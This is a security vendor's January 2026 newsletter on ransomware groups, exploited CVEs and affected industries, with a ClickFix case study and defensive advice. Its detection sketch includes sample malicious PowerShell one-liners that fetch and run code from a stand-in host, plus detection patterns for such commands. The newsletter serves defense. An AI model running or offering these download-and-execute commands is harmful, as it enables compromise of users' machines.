MOXFIVE Monthly Insights - January 2026
In this newsletter, we share the latest ransomware and threat actor insights from the MOXFIVE team. Click the button below to subscribe if you are not already on the MOXFIVE mailing list.

Subscribe

Ransomware Highlights for January 2026

Ransomware operations maintained steady pressure in January, with a modest decline from December's volume. Activity was driven by established groups exploiting familiar vulnerabilities, while social engineering techniques continued to evolve as effective initial access vectors. Qilin, Sinobi, and Akira led deployment activity, with Manufacturing and Production, Technology, and Healthcare bearing the greatest impact.

January brought a mix of targeted espionage and broad exploitation across critical enterprise infrastructure. APT28 weaponized a Microsoft Office security feature bypass in espionage campaigns targeting Ukraine and European nations. Critical vulnerabilities in Oracle WebLogic proxy components and Ivanti mobile device management systems both saw exploitation following disclosure. MOXFIVE responded to several cases involving ClickFix, a social engineering technique that manipulates users into executing malicious commands by impersonating legitimate system prompts. This month's Case Study examines how ClickFix campaigns function as initial access for ransomware deployment, while the Resilience Spotlight provides guidance on defending against user-initiated compromise that bypasses automated detection.

Top Threats & Exploits

Phishing emails, VPN vulnerabilities, lack of Multifactor Authentication (MFA), software flaws, drive-by downloads, and social engineering remain the most frequently observed initial access points for ransomware attacks.

  • Microsoft Office security feature bypass (CVE-2026-21509): This vulnerability allows threat actors to bypass OLE mitigations in Microsoft 365 and Office by sending a crafted document to a victim. Microsoft issued an out-of-band update on January 26, 2026, and confirmed active exploitation. APT28, a Russia-linked cyber espionage group, has been observed weaponizing this vulnerability in campaigns targeting Ukraine and European nations using malicious RTF files to deliver backdoors and email theft tools.
  • Oracle HTTP Server and WebLogic Server proxy plug-ins path handling vulnerability (CVE-2026-21962): This critical vulnerability impacts Oracle HTTP Server and the WebLogic Server Proxy Plug-ins for Apache HTTP Server and Microsoft IIS. An unauthenticated attacker with network access via HTTP can send crafted requests to gain unauthorized access to data, including the ability to create, delete, or modify critical information. The vulnerability affects versions 12.2.1.4.0, 14.1.1.0.0, and 14.1.2.0.0, with patches available in Oracle's January 2026 Critical Patch Update.
  • Ivanti Endpoint Manager Mobile code injection vulnerabilities (CVE-2026-1281/CVE-2026-1340): These critical vulnerabilities allow unauthenticated remote code execution on Ivanti's mobile device management solution. Ivanti confirmed exploitation affecting a limited number of customers before disclosure on January 29, 2026. Following the release of public proof-of-concept code, mass exploitation attempts were observed from multiple source IPs.

Active Threat Actors

Ransomware activity in January showed a modest decline compared to December. Ransomware-as-a-Service models continued to drive a significant portion of attacks in January, with affiliate-driven operations accounting for many of the actively deployed variants. Several newer operations also warrant monitoring based on recent visibility, including LockBit 5.0 and Warlock.

  • Qilin ranked as the most active ransomware variant deployed in January. The group's commission-based RaaS model, which offers affiliates 80 to 85% of ransom payments, has driven its popularity among cybercriminals. Qilin deployments include payloads for both Windows and Linux environments and rely on double extortion tactics.
  • Sinobi remained active in January. The group emerged in mid-2025 and has rapidly scaled operations since MOXFIVE first encountered the variant in July. Sinobi uses double extortion tactics, with most observed victims in the United States and additional victims reported across several regions.
  • Akira, Inc, and Play all remained active in January. Akira was one of the most active RaaS operations in 2025 and continues that trend into 2026. Inc was first observed in 2023 and has since become a widely adopted double-extortion ransomware family. Play operates as a closed group, maintaining tight control over intrusions and deploying custom tooling for internal discovery and data exfiltration.
Graph showing the most active ransomware variants in January 2026 - Qilin 13%, Sinobi and Akira 11%, Inc 10% and Play 8%.

Figure 1: Top ransomware variants in January 2026 based on number of known victims.

The ransomware and industry rankings in this newsletter are based on observed ransomware data leak site (DLS) activity for impacted organizations in the United States.

For a deeper look into these groups, MOXFIVE has published Threat Actor Spotlights on Qilin, Sinobi, Akira, Inc, and Play.

Top Industries Impacted by Ransomware

Manufacturing and Production remained the most impacted industry in January, continuing a trend observed throughout 2025. Threat actors continue to target this sector due to the high impact that business interruption can have and the use of connected supply chains that create multiple paths for initial access. Technology was the second most impacted industry, as service providers and software platforms often maintain direct integration with client networks and cloud environments, increasing the potential impact of a single intrusion.

Healthcare, Professional Services, and Retail and Hospitality also saw consistent ransomware activity in January. Healthcare organizations continued to face attacks due to the sensitivity of patient and operational data and their limited tolerance for sustained outages. Professional Services firms remained targets as they often hold sensitive client information and intellectual property. Retail and Hospitality incidents often involve organizations that process payment data or operate distributed physical locations, exposing point-of-sale systems and supporting infrastructure.

Graph showing the industries most impacted by ransomware in January 2026. Manufacturing & Production - 18%, Technology - 17%, Healthcare - 11%, Professional Services - 11%, and Retail and Hospitality - 11%.

Figure 2: Top industries impacted by ransomware in January 2026.

Manufacturing and Production drew attention from all five top-ranked variants in January. Play showed the highest concentration in the sector, while Sinobi activity was most concentrated across Manufacturing and Production, Healthcare, and Retail and Hospitality. Akira maintained its focus on Manufacturing and Production along with Construction and Engineering. Cl0p, while not ranked among the top five this month, posted several victims in Technology.

Case Study - ClickFix Social Engineering: Browser Prompts to System Compromise

MOXFIVE has responded to several recent cases involving ClickFix, a social engineering technique that manipulates users into executing malicious PowerShell commands by impersonating legitimate error messages or CAPTCHA verifications. The technique was first observed in March 2024, and campaigns using it surged throughout 2025. Both cybercriminals and nation-state actors from North Korea, Iran, and Russia actively use ClickFix to deliver infostealers, remote access trojans, and ransomware; in some cases the technique has served as the initial access used to deploy Qilin ransomware.

The attack relies on convincing users to paste malicious commands into the Windows Run dialog or a PowerShell console under the pretext of fixing browser errors, completing security verifications, or resolving file access issues. In January 2026, Microsoft identified a new variant called CrashFix that deliberately crashes the victim's browser before presenting fake recovery instructions. ClickFix succeeds because the execution is user-initiated: the lure carries no malicious attachment or link for email and web filtering to flag, and the first stage is a pasted one-liner rather than a file dropped on disk. The execution is not invisible on the endpoint, however. It leaves an interpreter (typically powershell.exe) spawned by explorer.exe or a browser, and commands entered through the Run dialog are recorded under the user's RunMRU registry key. The technique continues to evolve with variants including FileFix, JackFix, GlitchFix, and fake Windows update screens, all designed to exploit user trust in familiar system interfaces.

Resilience Spotlight - Defending Against ClickFix Social Engineering

ClickFix attacks succeed by bypassing technical controls and exploiting user behavior, requiring a defense strategy that combines user awareness with targeted monitoring. Traditional endpoint protections can struggle to classify user-initiated command execution, but organizations can reduce exposure by restricting interactive PowerShell use for standard users, monitoring clipboard and process-creation telemetry for the hidden-window, encoded, and download-and-execute patterns these lures rely on, and deploying email gateway filtering for HTML attachments. One caveat on the first of these: the PowerShell execution policy is not a security boundary. A pasted one-liner run with -Command or -EncodedCommand executes regardless of the policy setting, so the controls that actually bite are application control (AppLocker or WDAC), Constrained Language Mode, and, where business need allows, disabling the Run dialog through Group Policy. The most effective defense remains educating users that legitimate sites never ask them to paste commands into Run dialogs or PowerShell consoles.
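The case study above describes what a ClickFix paste looks like on the endpoint, and the monitoring recommended here depends on recognizing it in process-creation telemetry. The following is an added detection sketch written for this page; it is not MOXFIVE tooling and the events it scores are constructed samples shaped like Sysmon Event ID 1 or Security 4688 records reduced to parent image, image, and command line. The scoring weights, the threshold, and the example.invalid hostnames are assumptions chosen for illustration.

```python
"""
Detection sketch for ClickFix-style execution (added example, not MOXFIVE tooling).
Input: process-creation records reduced to (parent image, image, command line).
The SAMPLE_EVENTS below are constructed for illustration; hostnames are assumed.
"""
import base64
import re

# Where a ClickFix victim is told to paste: the Run dialog (parent explorer.exe)
# or a browser that spawned the interpreter directly.
LAUNCHER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Hallmarks of a pasted one-liner: hidden window, profile/policy bypass, fetch-and-execute.
SUSPICIOUS_TOKENS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "no profile"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget)\b", re.I), "remote fetch"),
    (re.compile(r"\bmshta\b.*https?://", re.I), "mshta remote"),
]
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Score one process-creation event; returns (score, reasons)."""
    reasons = []
    parent, image, cmdline = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    if image not in INTERPRETERS:
        return 0, reasons
    if parent in LAUNCHER_PARENTS:
        reasons.append(f"{image} launched by {parent}")
    decoded = decode_encoded_command(cmdline)
    if decoded:
        reasons.append("encoded command decoded")
    # Inspect the decoded payload alongside the raw command line so encoding does not hide tokens.
    text = cmdline + ("\n" + decoded if decoded else "")
    for pattern, label in SUSPICIOUS_TOKENS:
        if pattern.search(text):
            reasons.append(label)
    return len(reasons), reasons


def find_clickfix_candidates(events, threshold=3):
    """Return events whose score meets the (assumed) threshold, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"event": ev, "score": score, "reasons": reasons})
    return hits


# Constructed samples: a Run-dialog paste, a browser-spawned encoded variant, and two benign events.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iex (irm http://example.invalid/verify.txt)"'},
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16-le")).decode()},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"], hit["event"]["cmdline"][:70])
```

The third sample is deliberately a scheduled script run with -ExecutionPolicy Bypass under svchost.exe: it scores one point and is not reported, which illustrates why the parent process and the fetch-and-execute tokens, not the execution policy flag alone, carry the signal. Pair this with a RunMRU review on suspected hosts, since a Run-dialog paste is recorded there even when command-line logging is incomplete.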

Critical Controls for ClickFix Defense:

How MOXFIVE Can Help

MOXGUARD: Strategic advisory including AD/identity assessments, CVE alerting prioritized to active ransomware exploitation, guidance on segmentation and backup hardening, tabletop exercises with response playbooks, and pre-positioned incident response.

Professional Services: Control validation through EDR coverage assessments, purple team exercises, network segmentation reviews, backup immutability and restoration testing, external attack surface reduction, and SIEM/XDR detection engineering.

Our team has handled hundreds of ransomware cases against Qilin, Sinobi, Akira, Inc, Play, and other active operations, aligning preventive, detective, and recovery controls to current threat actor TTPs. Contact us at 833-568-6695 or incident@moxfive.com.